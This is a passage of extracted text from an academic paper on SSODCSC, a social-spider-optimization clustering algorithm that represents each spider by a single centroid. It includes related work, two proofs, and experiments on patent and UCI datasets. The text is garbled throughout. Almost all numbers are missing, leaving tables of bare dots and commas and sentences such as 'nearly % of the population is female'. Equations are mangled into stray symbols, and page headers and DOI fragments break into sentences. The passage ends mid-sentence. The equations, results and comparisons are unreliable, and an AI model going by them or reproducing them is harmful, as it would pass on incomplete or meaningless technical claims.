eq. ( ). wi; j ¼ tfi; j � idfj ( ) in eq. ( ), tfi, j (term frequency of the jth distinguishable term of the dataset ds in ith data instance) is the number of times that the jth distinguishable term of the dataset ds occurred in the ith data instance, and idfj is the inverse document frequency of the jth distinguishable term of the dataset ds. idfj can be calculated using eq. ( ). idfj ¼ log m n � � ( ) in eq. ( ), n is the total number of data instances in ds and m is the number of data instances in which the jth distinguishable term of the dataset ds is present. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ contributions in the last decade, nature-inspired algorithms have been successfully applied for solving np-hard clustering problems. in the state-of-the-art nature inspired algorithms for solving clustering problems, each agent in the population is taken as a collection of k clusters. therefore, the memory requirements and cpu times of these algorithms are very high. these algorithms return the best agents in which sicd is minimized or the average of icd is minimized. in other words, the fitness of the agent is measured by the consideration that all k clusters present in it as a whole. this, however, does not mean that all clusters should have low icd individually in order to get a low sicd, as even the globally best agent with the best fitness may contain some clusters that have very high icd. suppose ds = {dv , dv , dv , dv , dv , dv , dv , dv , dv , dv }, k = , number of the agents = , and the contents of the agents are as shown in figs. – . according to all state-of-the-art nature-inspired algorithms, the best agent will be agent as it has the lowest sicd value. however, these algorithms will not give any assurance that the three clusters figure data instances present in agent . it specifies data instances present in agent . full-size doi: . /peerj-cs. /fig- figure data instances present in agent . it specifies data instances present in agent . full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ have the lowest individual icd. table specifies the best three agents (spiders) returned by our proposed algorithm. the sicd value of the globally best solution is + + = , which is less than the sicd value of the globally best solution in the k-cluster representation of the agent. therefore, the clustering results produced by the start-of-the art algorithms that use k-centroid representation for agents may not be highly accurate. the proposed approach not only focuses on sicd but also on the individual icd of the clusters. in our proposed algorithm, social spider optimization for data clustering using single centroid (ssodcsc), each spider is represented by a single centroid and the list of data instances close to it. this representation requires k times less memory requirements than the representation used by the other state-of-the-art nature-inspired algorithms like sso, as shown below. each data instance in the dataset is given an identification number. instead of storing data instances, we stored their identification numbers (which are integer values) in spiders. figure data instances present in agent . it specifies data instances present in agent . full-size doi: . /peerj-cs. /fig- figure data instances present in agent . it specifies data instances present in agent . full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for ssodcsc: number of spiders used = number of iterations for best clustering results = total number of spiders to be computed = � = , memory required for storing a double value = bytes memory required for storing a spider’s centroid (that consists of m dimension values) = � m bytes, where m is the number of dimensions present in the dataset. memory required for storing an integer value representing identification number of a data instance = bytes. maximum memory required for storing the list of identification numbers of data instances closer to the centroid = � n bytes, where n is number of data instances present in the dataset. maximum memory required for a spider = � m + � n bytes therefore, total computational memory of ssodcsc = , � ( � m + � n) bytes. for sso: number of spiders used = number of iterations for best clustering results = total number of spiders to be computed = � = , memory required for storing a double value = bytes memory required for storing k centroids of a spider = � m � k bytes, where m is the number of dimensions present in the dataset. memory required for storing an integer value representing identification number of a data instance = bytes table the best three agents returned by ssodcsc. agent data vectors intra-cluster distance part of best solution? spider dv , dv , dv no spider dv , dv , dv no spider dv , dv , dv , dv no spider dv , dv , dv , dv , dv , dv yes spider dv , dv no spider dv , dv no spider dv , dv , dv , dv , dv no spider dv , dv yes spider dv , dv , dv no spider dv , dv , dv , dv , dv no spider dv , dv , dv no spider dv , dv yes thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ maximum memory required for storing k lists of identification numbers of data instances (where each list is associated with a centroid) = � n � k bytes, where n is the number of data instances present in the dataset, and k is the number of centroids present in each spider. maximum memory required for a spider = k�( � m + � n) bytes therefore, total computational memory of sso = , � k� ( � m + � n) bytes. the time required for initiating the spiders will be less in this representation. the average cpu time per iteration depends on the time required for computing fitness values and the time required for computing the next positions of the spiders in the solution space. the fitness values and next positions of spiders can be computed in less time with single centroid representation, so that the average cpu time per iteration reduces gradually. the proposed algorithm returns best k spiders such that the union of the lists of data instances present in them will produce exactly all of the data instances in ds. in the basic sso algorithm, non-dominant males are not allowed in the mating operation because of their low weight values. they do not receive any vibrations from other spiders and have no communication in the web, as the communication is established through vibration only (shukla & nanda, ). therefore, their presence in the solution space is questionable. moreover, their next positions are dependent on the existing positions of the dominant male spiders (cuevas et al., ). they cannot be part of the selected solution when dominant male spiders are in the solution space. in our proposed algorithm, ssodcsc, we convert them into dominant male spiders by increasing their weight values and then allowing them to participate in the mating operation to produce a new spider, better than the worst spider in the population. in sso, each dominant male mates with a set of females and produces a new spider. the weight of the new spider may or may not be greater than that of the worst spider. but as we make the weight of each non-dominant male spider greater than the average weight of the dominant male spiders in ssodcsc, the new spider produced by the non-dominant male spider is surely better than the worst spider. in other words, not only did we convert non-dominant male spiders into dominant male spiders, but also we made them more effective than the dominant male spiders. therefore, each spider receives vibrations from other spiders and has a chance at becoming a part of the selected solution, unlike in sso. at each iteration of ssodcsc, the population size is the same but the spiders with greater weight values are introduced in place of the worst spiders. as a result, the current solution given by ssodcsc moves toward the globally best solution as the number of iterations is increased. we applied ssodcsc on feature-based datasets and text datasets. this paper is organized as follows: “related work” describes the recent related work on solving clustering problems using nature-inspired algorithms, “proposed algorithm: ssodcsc” describes ssodcsc, “results” includes experimental results, and we conclude the paper with future work in the section “discussion.” related work shukla & nanda ( ) proposed two clustering algorithms based on the original version of sso and a parallel version of sso (p-sso). p-sso computes the next position of female thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ spiders, dominant male spiders, and non-dominant male spiders simultaneously in each iteration. they applied the two algorithms on low dimensional datasets, high dimensional datasets, overlapping datasets, and non-overlapping datasets, and found that the two algorithms are able to produce consistent clustering results as compared with other clustering algorithms. they designed a flood image segmentation application based on their proposed work and got two times better accuracy than the k-means when applied on nasa satellite images of flood affected areas of chennai. zhou et al. ( ), used the symbiotic organism search (sos) algorithm for solving clustering problems. the sos algorithm mimics the interactive behavior of the organisms in nature. in sos, new solutions are generated by imitating the biological interactions between two organisms in the ecosystem. sos implements three phases, namely, the mutualism phase, the commensalism phase, and the parasitism phase. in the mutualism phase, the organisms interact to increase their mutual survival advantage. in the commensalism phase, the interaction benefits one organism but does not impact the other. in the parasitism phase, the organism with better fitness will kill the other. the proposed algorithm produced better clustering results when compared with other algorithms with low dimensional datasets. however, the authors did not apply sos on high dimensional datasets. the algorithm suffers from an imbalance between exploration and exploitation due to its high randomness. nayak et al. ( ), hybridized the elicit teaching learning based optimization approach with the fuzzy c-means (fcm) clustering algorithm. at each iteration of elicit teaching learning-based optimization, the worst entities are replaced with the best entities in each cluster group. the best cluster centroids produced by elicit teaching learning based optimization are taken as the inputs for the fcm clustering algorithm. they found that the proposed algorithm produces clustering solutions of better fitness values when compared with other clustering algorithms. zhou et al. ( ), proposed a simplex method based social spider optimization (smsso) algorithm to overcome the drawbacks of sso, namely local optima entrapment and poor convergence rates. in the proposed algorithm, the spider with the worst fitness is replaced by a reflected or extended alternate spider so that the global search may be improved. the largest dataset used in the experiments has only dimensions. the proposed algorithm looks good with low dimensional datasets. it may not be as effective for high dimensional datasets as the simplex mechanism will become expensive for those datasets. the differences between smsso and our proposed algorithm ssodcsc are as follows: in smsso, the initial solution moves along the edges of the polytope until it reaches the optimal solution, in ssodcsc, the solution space will have spiders of better fitness values after every iteration. smsso supports the mating of dominant males only, but ssodcsc allows the mating of both dominant and non-dominant male spiders with female spiders. in smsso, the fitness of the new spider may or may not be better than that of the worst spider. in ssodcsc, the fitness of the new spider is always greater than that of the worst spider. in smsso, each spider is represented as a collection of k-centroids. in ssodcsc, each spider is represented as a single centroid. smsso returns the best spider, whereas ssodcsc returns a set of first k best spiders. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ han et al. ( ), proposed the bird flock gravitational search algorithm (bfgsa) to enable the gravitational search algorithm escape from sub optimal solutions. the authors used a concept called collective response of object reorientation to avoid stagnation. in that model, if the fitness of the global optimum remains the same in several subsequent iterations, the proposed algorithm defines the collective response of the object reorientation that updates the position of each object using the mean position of its nearest seven neighbors. the simulation results indicate that bfgsa can be used for both low and high dimensional datasets. the proposed algorithm convergences occur in iterations, which is relatively high when compared with other algorithms. jothi, mohanty & ojha ( ), proposed minimum spanning tree (mst) based clustering on the partition-based nearest neighbor graph for reducing the computational overhead. the proposed algorithm produces a sparse local neighborhood graph (lng) and then the approximate mst is constructed from lng. they showed that the proposed algorithm outperforms the traditional algorithms by reducing both the size and computational time to construct the lng. experiments are conducted on both synthetic and real datasets. chen et al. ( ), proposed a novel optimum-path forest (opf) clustering algorithm that can be used for remote sensing segmentation. they defined a probability density function using the principle that the cluster centers depend on their distances from samples with higher densities. they applied the proposed algorithm on five remote sensing land cover images. the clustering results show that the proposed algorithm outperforms the original opf approach. nayak et al. ( ), proposed an improved firefly-based fuzzy c-means algorithm (improved fafcm) to resolve the drawbacks of the fcm algorithm (fcm) using firefly algorithm. they used the firefly algorithm to minimize the objective function value of the fcm algorithm. the output centroids of the firefly algorithm are passed to the fcm algorithm as initial centroids so that it refines them further. they found that an improved fafcm produces better clustering results as compared to fcm, particle swarm optimization (pso), and fafcm. de andrade silva, hruschka & gama ( ), proposed a fast evolutionary algorithm for clustering data streams (feac-stream). it is capable of estimating the number of clusters to be formed from data in an online fashion. the page–hinkley test is used by feac-stream to identify eventual degradation in the induced cluster quality. the proposed algorithm is based on the assumption that clusters provide useful information about the dynamics of the data stream. they applied the proposed algorithm on synthetic and real-world data streams and showed that the proposed algorithm produces better clustering results than other algorithms. costa et al. ( ), proposed a nature-inspired approach for data clustering based on the optimum-path forest algorithm (opfc). opfc accepts a graph representation of the dataset. the nodes of the graph are samples and each sample is connected to its k-nearest neighbors. each node has a weight. the weight is its probability density function value, which is computed using its distances from l k-nearest neighbors. after the k-nn graph is thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ constructed, opfc finds roots which are the nodes with the maximum of probability density function values and propagates one optimum-path cluster from each root to the remaining nodes in the graph. alswaitti, albughdadi & isa ( ), presented a novel approach for data clustering based on particle swarms. for balancing exploitation and exploration, they used the kernel density estimation technique and estimated multidimensional gravitational learning coefficients. the kernel density estimation technique is used for avoiding premature convergence. they showed that the proposed algorithm produces better accuracy and better cluster compactness than other clustering algorithms when applied on benchmark datasets from the uci machine learning repository. proposed algorithm: ssodcsc social spider optimization is based on the cooperative behavior of social spiders for obtaining a common food. they are classified into two types, namely male spiders and female spiders (cuevas et al., ). nearly % of the population is female. each spider is characterized by its position, fitness, weight, and vibrations received from other spiders (thalamala, reddy & janet, ). in k-centroid representation, each spider has k-centroids which are associated with a list of data instances closer to it as shown in fig. a. in ssodcsc, each spider has two components, namely a centroid and a list of identification numbers of data instances closer to it, as shown in fig. b. the number of data instances close to the centroids of spiders may be different, the length of each spider may be different; however, the length of the centroid component of each spider is fixed. therefore, we used only centroid components of the spiders to specify their position in the solution space. when the spiders move in the solution space, only the centroid components are moved or updated. the new list of identification numbers of data instances may be found to be closer to the centroid, depending on its new location. we use the terms spider, position of spider, and centroid component of spider interchangeably in this article. the fitness of a spider is the sum of the distances of its data instances from its centroid. the weights of the spiders are computed based on their fitness values. figure (a) k-cluster representation of a spider; (b) single cluster representation of a spider. the figure specifies the components of a spider in k-cluster and single cluster representations. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in ssodcsc, the weight of a spider is inversely proportional to the fitness value of the spider. a spider with the first largest weight (first smallest fitness) is known as the globally best spider s gbs. in this paper, we use the notations s gbs and sgbs interchangeably. in ssodcsc, s gbs will have the largest weight and lowest value for the sum of the distances of data instances from the centroid. the spider with the least weight (largest fitness value) is known as worst spider sws, as shown in fig. . in ssodcsc, sws will have the least weight and largest value for the sum of the distances of the data instances from the centroid. each spider receives vibrations from the globally best spider sgbs, the nearest better spider snbs, and the nearest female spider snfs. the male spiders are classified into two types, namely dominant males and non-dominant males. the weight of a dominant male spider is greater than or equal to the median weight of male spiders (cuevas & cienfuegos, ) as shown in fig. . the male spiders that are not dominant males are called non-dominant males. a female spider can either attract or repulse other spiders. the weight of a spider s can be computed using eq. ( ). the lower the sum of the distances (i.e., fitness), the higher the weight of the spider will be in ssodcsc. weight ½s� ¼ fitness sð Þ � fitness swsð Þ fitness sgbs � � � fitness swsð Þ ( ) the ssodcsc algorithm returns spiders s gbs, s gbs ... and s k gbs that have the first k largest weight values (first k smallest fitness values) such that the union of the data instances present in them will give exactly all of the data instances present in the dataset. we used a two-dimensional array, namely spider, to store the centroid components of figure spiders on the scale of weight values. full-size doi: . /peerj-cs. /fig- figure male spiders on the scale of weight values. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ all spiders. for example, in the case of the iris dataset, the centroid component of first spider is stored in spider [ , ], spider [ , ], spider [ , ], and spider [ , ], as iris has four dimensions. the number of spiders returned by ssodcsc depends on the number of clusters inherently present in the dataset. for example, in the case of the iris dataset, though we use spiders, the algorithm returns the first best, second best, and third best spiders only, because the iris dataset inherently has three clusters. in the following subsections, we explain how the spiders are initialized in the solution space, the data instances are assigned to them, the next positions of the spiders are found, and the mating operation produces a new spider. initialization social spider optimization for data clustering using single centroid starts with the initialization of spiders in the solution space. initially all spiders are empty. the fitness of each spider is set to , and the weight is set to . each spider s is initialized with a random centroid using eq. ( ). spider ½s;d� ¼ lowerboundðdÞ þ randomð ; Þ � ðupperboundðdÞ � lowerboundðdÞÞ ( ) where spider [s, d] is dth dimension of the centroid of spider s, lowerbound (d) and upperbound (d) are the smallest and largest values of the dth dimension of the dataset, respectively. assignment of data instances the distances of each data instance from the centroids of all spiders are calculated using the euclidean distance function. a data instance is assigned to the spider that contains its nearest centroid. next positions of spiders the spiders are moved across the solution space in each iteration of ssodclc based on their gender. the movement of a spider in the solution space depends on the vibrations received from other spiders. the intensity of the vibrations originated from spider sj to spider si can be found using eq. ( ) and depends on the distance between the two spiders and the weight of spider sj. vibrations si; sj � � ¼ weight sj � � � e�distance si;sjð Þ ( ) next positions of female spiders the movement of a female spider sf depends on the vibrations from the globally best spider sgbs and its nearest better spider snbs as shown in fig. . to generate the next position of a female spider sf, a random number is generated and if it is less than the threshold probability (tp), the female spider attracts other spiders and the position of it is calculated according to eq. ( ). if not, it repulses other spiders and the position of it calculated according to eq. ( ). in eqs. ( ) and ( ), a, β, c, and d are random numbers from the interval [ , ]. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ spider ½sf ; d� ¼ spider ½sf ; d� þ a � spider ½sf ; d� � spider ½sgbs; d� � � � weight ½sgbs� � e�distanceðsf ;sgbsÞ þ b � spider ½sf ; d� � spider ½snbs; d� � � � weight ½snbs� � e�distanceðsf ;snbsÞ þ g � ðd � : Þ ( ) spider ½sf ; d� ¼ spider ½sf ; d� þ a � spider ½sf ; d� � spider ½sgbs; d� � � � weight ½sgbs� � e�distanceðsf ;sgbsÞ � b � spider ½sf ; d� � spider ½snbs; d� � � � weight ½snbs� � e�distanceðsf ;snbsÞ þ g � ðd � : Þ ( ) next position of male spiders the solution space consists of female spiders and male spiders. when data instances are added or removed from them, their fitness values and weight values will change. if the current weight of a male spider is greater than or equal to the median weight of dominant male spiders, it will be considered to be a dominant male spider. the male spiders that are not dominant male spiders are called non-dominant male spiders. the next position of a dominant male sdm can be calculated using eq. ( ). spider ½sdm; d� ¼spider ½sdm; d� þ a � spider ½sdm; d� � spider ½snfs; d� � � � weight ½snfs� � e�distanceðsdm; snfsÞ þ g � ðd � : Þ ( ) the position of the spider depended only on the vibrations received from its nearest female spider snfs. the pictorial representation of this is specified in fig. . the weighted mean of the male population, w, can be obtained using eq. ( ). let nf be the total number of female spiders in the spider colony and nm be the total number of male spiders. then the female spiders can be named as sf ; sf ; sf ; . . . . . . ::; sfnf and the male spiders can be named as sm ; sm ; sm ; . . . . . . ::; smnm. figure next position of a female spider in ssodcsc. the figure specifies how the next position of a female spider is calculated in ssodcsc. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ w ¼ pnm i¼ spider smi; d½ � � weight smið Þpnm i¼ �weight smið Þ ( ) the next position of the non-dominant male spider sndm can be calculated using eq. ( ) and depends on the weighted mean of the male population. spider ½sndm; d� ¼ spider ½sndm; d� þ a � w ( ) mating operation each dominant male spider mates with a set of female spiders within the specified range of mating to produce a new spider, as shown in fig. . the new spider will be generated using the roulette wheel method (chandran, reddy & janet, ). if the weight of the new spider is better than the weight of worst spider, then the worst spider would be replaced by the new spider. the range of mating r is calculated using eq. ( ). r ¼ diff � n ( ) figure next position of a dominant male spider in ssodcsc. the figure specifies how the next position of a dominant male spider is calculated in ssodcsc. full-size doi: . /peerj-cs. /fig- figure mating of a dominant male spider in ssodcsc. the figure specifies how a dominant male spider mates with a set of female spiders to produce a new spider in ssodcsc. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where diff is the sum of differences of the upper bound and lower bound of each dimension, and n is the number of dimensions of the dataset ds. in sso, the non-dominant male spiders are not allowed to mate with female spiders, as they would produce new spiders having low weights. in ssodcsc, a non-dominant male spider is converted into dominant male spider by making sure that its weight becomes greater than or equal to the average weight of dominant male spiders so that it participates in the mating process and produces a new spider whose weight is better than that of at least one other spider. the theoretical proof for the possibility of converting a non-dominant male spider into a dominant male spider is provided in theorem . thus, non-dominant male spiders become more powerful than dominant male spiders as they are made to produce new spiders that surely replace worst spiders in the population. the theoretical proof for the possibility of obtaining a new spider that is better than the worst spider, after a non-dominant male spider mates with the female spiders is provided in theorem . the following steps are used to convert a non-dominant male spider into a dominant male spider: step : create a list consisting of data instances of the non-dominant male spider sndm in the decreasing order of their distances from its centroid. step : delete the top-most data instance (i.e., the data instance which is the greatest distance from the centroid) from the list. step : find the weight of the non-dominant male spider sndm. step : if the weight of non-dominant male is less than the average weight of dominant male spiders, go to step . the flowchart for ssodcsc is specified in fig. . theorem . a non-dominant male spider can be converted into a dominant male spider in single centroid representation of sso. proof: let sndm be the non-dominant male spider whose weight is wndm. let medwgt be the median weight of male spiders (which is always less than or equal to ). but according to definition of the non-dominant male spider, wndm < medwgt ( ) assume that the theorem is false. ⇒ sndm can not be converted into a dominant male spider ⇒ during the movement of sndm in the solution space, wndm < ( ) let sum be the sum of distances of data instances from the centroid of sndm. if the data instance that is the furthest distance from the centroid of sndm is removed from sndm, then ⇒ sum of distances of data instances from the centroid of sndm will decrease, as sum = sum-distance of removed data instance from the centroid of sndm. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ⇒ fitness of sndm will decrease, as fitness of sndm is proportional to sum ⇒ the weight of sndm will increase as the weight of sndm is inversely proportional to fitness of sndm similarly, if a data instance is added to sndm, then ⇒ sum of distances of data instances from centroid of sndm will increase. ⇒ fitness of sndm will increase. ⇒ the weight of sndm will decrease. therefore, wndm ¼ � xn i¼ wdi ( ) where is the initial weight of sndm, n is the total number of data instances added to sndm, and wdi is the decrease in the weight of sndm when ith data instance was added to sndm. when all the data instances are removed from sndm, wndm ¼ wndm þ xn i¼ wdi ¼ � xn i¼ wdi þ xn i¼ wdi ( ) but according to eq. ( ), wndm can never be during the movement of sndm in the solution space. hence, our assumption is wrong. so, we can conclude that a non-dominant male spider can be converted into dominant male spider in single centroid representation of sso. theorem . the weight of the new spider resulting from the mating of a non-dominant male spider with a weight greater than or equal to the average weight of dominant male spiders will be better than at least one spider in the population. proof: let sndm be the non-dominant male spider whose weight became greater than or equal to the average weight of dominant male spiders. let sf ; sf ; sf ; . . . . . . ::; sfm be female spiders that participated in the mating. let snew be the resulting new spider of the mating operation. let n be the total number of spiders in the colony. assume that the theorem is false. it implies: pn i¼ weight sið Þ � weight snewð Þ? : ¼ ( ) in other words, the total number of spiders whose weight is less than or equal to that of snew is zero. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ but according to the roulette wheel method: snew ¼ pm i¼ sfi � weight sfi � �� � þ sndm � weight sndmð Þpm i¼ weight sfi � �� � þ weight sndmð Þ ( ) ⇒ lim weight sfið Þ! ^weight sndmð Þ! snew = sndm with weight equal to = sgbs (since any spider whose weight is is always sgbs) and lim weight sfið Þ! ^weight sndmð Þ! snew ¼ m female spiders whose weight is ð Þ þ sndm whose weight is ð Þ m þ ¼ m þ ð Þ � sgbs m þ ¼ sgbs so, when weight sfi � � tends to , and weight (sndm) tends to , snew becomes sgbs. when weight sfi � � tends to , and weight (sndm) (sndm) tends to , snew becomes sgbs. similarly, when weight sfi � � tends to , and weight (sndm) tends to , snew becomes sgbs. substituting sgbs in place of snew in eq. ( ), xn i¼ weight sið Þ � weight sgbs � � ? : ¼ ( ) according to eq. ( ), the number of spiders whose weight is less than or equal to the weight of sgbs is zero. but according to the definition of sgbs, its weight is greater than or equal to the weights of all remaining spiders. so, there are spiders whose weights are less than or equal to the weight of sgbs. therefore eq. ( ) is false. hence, our assumption is wrong. therefore, we can conclude that the weight of snew produced by sndm is greater than that of at least one spider in the population. results the proposed algorithm and the algorithms used in the comparison were implemented in the java run time environment, version . . . , and the experiments were run on intel xeon cpu e v with a . -ghz processor with a gb ram. the windows professional operating system was used. applying ssodcsc on patent datasets at first, we applied ssodcsc on six patent corpus datasets. the description of the data sets is given in table . patent corpus contains , text documents with technical descriptions of the patents that belong to different classes. each class has exactly text documents. each text document contains only a technical description of the patent. all text documents were prepared using the ascii format. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as ssodcsc returned k best spiders, the sicd of clusters in those spiders was calculated. table specifies the clustering results of ssodcsc when applied on patent corpus datasets. for each dataset the sicd value, cosine similarity value, f-measure value and accuracy obtained were specified. table specifies the relationship between the sicd values and number of iterations. lower sicd value indicate a higher clustering quality. it was found that as we increased the number of iterations, the sicd decreased and thereby, the clustering quality increased. figure flowchart of ssodcsc. the flowchart specifies the various steps in ssodcsc. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to find the distance between data instances, we used the euclidean distance function and manhattan distance function. data instances having small differences were placed in same cluster by the euclidean distance function, as it ignores the small differences. table description of patent corpus datasets. patent corpus patent corpus patent corpus patent corpus patent corpus patent corpus number of text documents number of clusters table clustering results of ssodcsc: patent corpus datasets. dataset sicd cosine similarity f-measure accuracy patent corpus , . . . . patent corpus , . . . . patent corpus , . . . . patent corpus , . . . . patent corpus , . . . . patent corpus , . . . . table relationship between sicd and number of iterations: ssodcsc: patent corpus datasets. dataset iterations iterations iterations iterations iterations patent corpus , . , . , . , . , . patent corpus , . , . , . , . , . patent corpus , . , . , . , . , . patent corpus , . , . , . , . , . patent corpus , . , . , . , . , . patent corpus , . , . , . , . , . note: the best values are specified in bold. table comparison between distance functions: ssodcsc: patent corpus datasets. dataset euclidean distance function manhattan distance function accuracy avg. cosine similarity accuracy avg. cosine similarity patent corpus . . . . patent corpus . . . . patent corpus . . . . . patent corpus . . . . patent corpus . . . . patent corpus . . . . note: the best values are specified in bold. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it was found that ssodcsc produced a slightly better clustering result with the euclidean distance function as shown in table . table specifies the comparison between clustering algorithms with respect to sicd values. table specifies the comparison between clustering algorithms with respect to accuracy. ssodcsc produces better accuracy for all datasets. the overall percentage increase in the accuracy is approximately %. the silhouette coefficient sc of a data instance di can be calculated using eq. ( ). sc ¼ b � a max a; bð Þ ( ) where a is the average of distances between data instance di and other data instances present in its containing cluster, and b is the minimum of distances between data instance table comparison between clustering algorithms in terms of sicd: patent corpus datasets. dataset k-means pso ga abc ibco aco smsso bfgsa sos sso ssodcsc patent corpus , . , . , . , . , . , . , . , . , . , . , . patent corpus , . , . , . , . , . , . , . , . , . , . , . patent corpus , . , . , . , . , . , . , . , . , . , . , . patent corpus , . , . , . , . , . , . , . , . , . , . , . patent corpus , . , . , . , . , . , . , . , . , . , . , . patent corpus , . , . , . , . , . , . , . , . , . , . , . note: the best values are specified in bold. table comparison of clustering algorithms in terms of accuracy: patent corpus datasets. dataset k-means pso ga abc ibco aco smsso bfgsa sos sso ssodcsc patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . note: the best values are specified in bold. table average silhouette coefficient value: patent corpus datasets. dataset k-means pso ga abc ibco aco smsso bfgsa sos sso ssodcsc patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . note: the best values are specified in bold. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ di and data instances present in other clusters. the range of the silhouette coefficient is [- , ]. when it is closer to , better clustering results will be produced. table specifies the comparison between clustering algorithms with respect to the average silhouette coefficient values of datasets. ssodcsc produces better average silhouette coefficient values for all patent corpus datasets. from figs. to , it is obvious that ssodcsc produces the largest inter-cluster distances and smallest icd for patent corpus datasets. applying ssodcsc on uci datasets we applied ssodcsc on uci data sets as well. the description of the data sets is given in table . table specifies the relationship between sicd values and the number of iterations. as we increase the number of iterations, the sicd is also reduced. for the iris dataset, the sicd value is . at iterations but as we increase the number of iterations, the sicd value of the clustering result also decreases until it reaches . at iterations. however, it remains at . , after iterations and it becomes obvious that ssodcsc converges in iterations. table specifies the best three spiders for the iris dataset. we initialized a solution space with spiders, among which, the first spiders were females and the remaining were males. our proposed algorithm returned spider , spider , and spider . spider and spider were females and spider was a male spider. the centroids of these spiders were ( . , . , . , . ), ( . , . , . , . ), and ( . , . , . , . ), respectively. these centroids have four values as iris dataset consists of four figure inter-cluster distances: patent corpus datasets. the figure specifies inter-cluster dis- tances returned by clustering algorithms when applied on patent corpus datasets. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ attributes. the sum of the distances between the data instances present in the iris dataset and their nearest centroids in table was found to be . , as shown in table . table specifies the best six spiders for vowel dataset. our proposed algorithm returned spider , spider , spider , spider , spider , and spider . spider , spider , spider , and spider were females, and spiders and spider were male spiders. the sum of the distance between the data instances present in the vowel data set and their nearest centroids in table was found to be , . , as shown in table . table specifies the best three spiders for the cmc dataset. our proposed algorithm returned spider , spider , and spider among which spider and spider figure intra-cluster distances: patent corpus datasets. the figure specifies intra-cluster dis- tances returned by clustering algorithms when applied on patent corpus datasets. full-size doi: . /peerj-cs. /fig- table description of uci datasets. dataset number of classes number of attributes number of instances iris wine glass vowel cancer cmc , haberman bupa thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ were females and spider was a male spider. the centroids of these spiders are specified. these centroids had nine values as the cmc dataset consists of nine attributes. the sum of the distance between the , data instances present in the cmc data set and their nearest centroids in table was found to be , . , as shown in table . tables and specify the best spiders and their centroids for the glass and wine datasets, respectively. the sum of the distances between the data instances present in the glass dataset and their nearest centroids in table was found to be equal to . , as shown in table . if we find the sum of the distances between the data instances present in the wine dataset and their nearest centroids in table , it would be equal to , . , as shown in table . table relationship between sicd and number of iterations: ssodcsc: uci datasets. dataset iterations iterations iterations iterations iterations iris . . . . . vowel , . , . , . , . , . cmc , . , . , . , . , . glass . . . . . wine , . , . , . , . , . note: the best values are specified in bold. table best three spiders of iris dataset: ssodcsc. best spiders dimension dimension dimension dimension spider . . . . spider . . . . spider . . . . table best six spiders of vowel dataset: ssodcsc. best spiders dimension dimension dimension spider . , . , . spider . , . , . spider . , . , . spider . , . , . spider . , . , . spider . . , . table best three spiders of cmc dataset: ssodcsc. best spiders dimension dimension dimension dimension dimension dimension dimension dimension dimension spider . . . . . . . . . spider . . . . . . . . . spider . . . . . . . . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table specifies the average cpu time per iteration (in seconds), when clustering algorithms were applied on the cmc dataset. it was found that ssodcsc produces clustering results with the shortest average cpu 